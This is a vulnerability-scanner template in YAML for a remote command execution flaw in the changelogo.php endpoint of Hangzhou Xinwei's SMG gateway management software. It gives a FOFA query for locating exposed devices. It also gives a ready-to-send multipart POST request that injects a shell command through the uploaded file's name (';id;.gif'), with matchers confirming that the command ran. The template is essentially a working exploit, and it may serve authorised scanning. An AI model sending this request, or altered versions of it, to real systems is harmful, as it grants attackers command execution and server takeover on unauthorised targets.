id: SMG-changelogo_php-RCE

info:
  name: 杭州新威数字信息 SMG网关管理软件 changelogo.php 命令执行漏洞 
  author: Superhero
  severity: high
  description: |-
    fofa: body="text ml10 mr20" && (title="网关管理软件" || title="Gateway Management")
    杭州新威数字信息 SMG网关管理软件 changelogo.php 接口存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
  reference:
    - https://mp.weixin.qq.com/s/48pDe8DLDJIqFgQztcczSw
  tags: RCE

http:
  - raw:
      - |
        POST /changelogo.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
        Content-Type: multipart/form-data; boundary=---------------------------136689467536665089023051840895

        -----------------------------136689467536665089023051840895
        Content-Disposition: form-data; name="file"; filename=";id;.gif"
        Content-Type: image/gif

        123321

        -----------------------------136689467536665089023051840895
        Content-Disposition: form-data; name="test"
        

        -----------------------------136689467536665089023051840895
        Content-Disposition: form-data; name="upload"

        Apply
        -----------------------------136689467536665089023051840895--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script>uid='
          - 'gid='
          - '首页刷新页面查看效果'
        condition: and
      - type: status
        status: 
          - 200